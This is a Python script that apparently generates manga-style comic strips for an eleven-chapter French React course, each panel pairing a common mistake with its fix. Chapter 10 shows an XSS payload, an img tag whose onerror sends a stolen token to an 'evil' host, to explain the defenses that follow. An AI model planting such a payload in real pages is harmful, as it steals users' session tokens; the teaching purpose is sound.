"""Planches manga du cours React (11 chapitres). Usage : python3 manga12.py <page>"""
import sys, pathlib
sys.path.insert(0, str(pathlib.Path(__file__).parent))
from manga_gabarit import strip3, apply
F = lambda *a: strip3(*a)
STRIPS = [
 ("c1", F("mgr1", "le tableau modifié en douce", "React 1",
   dict(term=["const u = props.user;", "u.roles.push('admin');", "setUser(u);"], bulle=["Je modifie,", "puis je range."]),
   dict(term=["l'écran ne se met pas à jour", "un autre composant affiche", "  admin sans raison"], rack=False, nuit=False, who='kai', expr='shock', sfx="?"),
   "copier, ne pas modifier", ["{ ...u, roles: [...u.roles, 'admin'] }", "TypeScript strict, readonly", "même référence = pas de rendu"],
   "React compare les références : modifier un objet existant ne déclenche pas de rendu et contamine les autres composants ; on crée toujours une copie.")),
 ("c2", F("mgr2", "la clé qui ment", "React 2",
   dict(term=["items.map((it, i) =>", "  <Ligne key={i} {...it} />)"], bulle=["L'index suffit,", "c'est unique."]),
   dict(term=["suppression de la ligne 1 :", "les saisies glissent", "  sur les mauvaises lignes"], rack=False, nuit=False, who='mika', expr='shock', sfx="décalé"),
   "une clé stable", ["key={it.id}, jamais l'index", "si la liste bouge ou se trie", "l'état suit la bonne ligne"],
   "La clé dit à React quelle ligne est quelle ligne : un index change quand la liste bouge, et l'état se retrouve sur la mauvaise ligne ; on utilise un identifiant stable.")),
 ("c3", F("mgr3", "trois clics, un seul +1", "React 3",
   dict(term=["const plus3 = () => {", "  setN(n + 1); setN(n + 1);", "  setN(n + 1); }"], bulle=["Trois appels,", "donc +3."]),
   dict(term=["n = 0 → clic → n = 1", "les trois appels lisent", "  la même valeur n = 0"], rack=False, nuit=False, who='kai', expr='shock', sfx="+1"),
   "la mise à jour fonctionnelle", ["setN(prev => prev + 1)", "l'état est une photo du rendu", "regrouper : un seul setState"],
   "Dans un rendu, l'état est une photo figée : pour enchaîner des mises à jour on passe une fonction, qui reçoit la valeur la plus récente.")),
 ("c4", F("mgr4", "l'effet qui boucle", "React 4",
   dict(term=["useEffect(() => {", "  fetch('/api/incidents')", "   .then(r => setData(r)) });"], bulle=["Ça charge", "les données."]),
   dict(term=["onglet réseau :", "  1 200 requêtes par minute", "l'API tombe"], sfx="1 200"),
   "maîtriser les effets", ["tableau de dépendances [zone]", "AbortController au nettoyage", "ou TanStack Query : cache, retry", "pas d'effet pour dériver un état"],
   "Un effet sans dépendances s'exécute après chaque rendu, et chaque setData en provoque un nouveau : dépendances explicites, annulation au nettoyage, ou une bibliothèque de données serveur.")),
 ("c5", F("mgr5", "un contexte pour tout", "React 5",
   dict(term=["<AppContext.Provider value={{", "  user, theme, panier,", "  filtres, saisie }}>"], bulle=["Un seul contexte,", "c'est plus", "simple."]),
   dict(term=["une lettre tapée dans la", "  recherche : 340 composants", "  re-rendus, saisie lente"], rack=False, nuit=False, who='mika', expr='angry', pose='hips', sfx="340"),
   "des contextes ciblés", ["un contexte par préoccupation", "valeur mémoïsée (useMemo)", "l'état local reste local", "profiler avant d'optimiser"],
   "Chaque changement de la valeur d'un contexte re-rend tous ses consommateurs : on découpe par préoccupation, on mémoïse la valeur, et l'état local reste dans son composant.")),
 ("c6", F("mgr6", "la cascade de chargements", "React 6",
   dict(term=["<Page> charge la zone,", "  puis <Liste> les incidents,", "  puis <Détail> les contacts"], bulle=["Chacun charge", "ses données."]),
   dict(term=["3 requêtes en série", "  800 ms + 900 ms + 700 ms", "écran blanc : 2,4 s"], rack=False, nuit=False, who='kai', expr='shock', sfx="2,4 s"),
   "charger en parallèle", ["loader de route ou prefetch", "requêtes lancées ensemble", "Suspense pour l'attente", "cache partagé (TanStack Query)"],
   "Des composants qui chargent l'un après l'autre créent une cascade : on déclenche les requêtes au niveau de la route, en parallèle, et un cache évite de les refaire.")),
 ("c7", F("mgr7", "le store qui copie le serveur", "React 7",
   dict(term=["store.incidents = await api()", "// et on le met à jour", "// à la main partout"], bulle=["Tout dans le store", "global, c'est", "propre."]),
   dict(term=["onglet A : incident clos", "onglet B : toujours ouvert", "trois sources de vérité"], rack=False, nuit=False, who='mika', expr='shock', sfx="≠"),
   "séparer les états", ["données serveur : cache de requêtes", "invalidation après mutation", "store : état client minimal", "l'URL porte les filtres"],
   "Recopier les données du serveur dans un store global crée des copies qui divergent : les données serveur vivent dans un cache de requêtes invalidé après chaque modification.")),
 ("c8", F("mgr8", "le bouton qui n'en est pas un", "React 8",
   dict(term=["<div className='btn'", "  onClick={valider}>", "  Valider</div>"], bulle=["Ça ressemble à", "un bouton."]),
   dict(term=["clavier : Tab ne l'atteint pas", "lecteur d'écran : « groupe »", "audit RGAA : non conforme"], rack=False, nuit=False, who='kai', expr='shock', sfx="RGAA"),
   "le HTML sémantique d'abord", ["<button type='submit'>", "<label htmlFor> sur chaque champ", "erreurs liées : aria-describedby", "axe dans les tests"],
   "Un div cliquable n'est ni focalisable ni annoncé : on utilise les éléments natifs (button, label, fieldset), et un test automatique d'accessibilité tourne dans la CI.")),
 ("c9", F("mgr9", "le test qui casse au refactor", "React 9",
   dict(term=["expect(wrapper.state('ouvert'))", "  .toBe(true)", "// on teste l'intérieur"], bulle=["100 % de", "couverture !"]),
   dict(term=["refactor : useState → reducer", "  même comportement", "  42 tests rouges"], rack=False, nuit=False, who='mika', expr='angry', pose='hips', sfx="42"),
   "tester le comportement", ["Testing Library : getByRole", "ce que l'utilisateur voit et fait", "MSW pour l'API", "peu de tests, mais vrais"],
   "Un test qui lit l'état interne casse au premier refactor sans rien protéger : on teste ce que l'utilisateur voit et fait, par rôles et libellés, avec l'API simulée par MSW.")),
 ("c10", F("mgr10", "le HTML de l'utilisateur", "React 10",
   dict(term=["<div dangerouslySetInnerHTML", "  ={{ __html: comment }} />", "// pour garder le gras"], bulle=["Les gens aiment", "le gras."]),
   dict(term=["commentaire : <img src=x", "  onerror=fetch(evil+token)>", "jetons volés (localStorage)"], sfx="XSS"),
   "ne jamais faire confiance", ["texte simple par défaut", "sinon DOMPurify avant rendu", "CSP stricte", "jeton en cookie HttpOnly (BFF)"],
   "Injecter du HTML fourni par un utilisateur ouvre la porte au XSS : on affiche du texte, on nettoie avec DOMPurify quand il le faut, une CSP bloque le reste, et aucun jeton ne vit dans localStorage.")),
 ("c11", F("mgr11", "la saisie qui gèle", "React 11",
   dict(term=["filtrer 10 000 incidents", "  à chaque frappe", "  dans le même rendu"], bulle=["Le filtre est", "instantané."]),
   dict(term=["chaque touche : 180 ms", "la saisie saccade", "l'utilisateur tape deux fois"], rack=False, nuit=False, who='mika', expr='angry', pose='hips', sfx="lag"),
   "garder la saisie fluide", ["useDeferredValue sur le filtre", "ou startTransition", "liste virtualisée", "mesurer avec le Profiler"],
   "Un rendu lourd dans le même tour que la saisie la bloque : useDeferredValue ou startTransition rendent la liste en priorité basse, et la virtualisation n'affiche que les lignes visibles.")),
]
if __name__ == '__main__': apply(sys.argv[1], STRIPS)
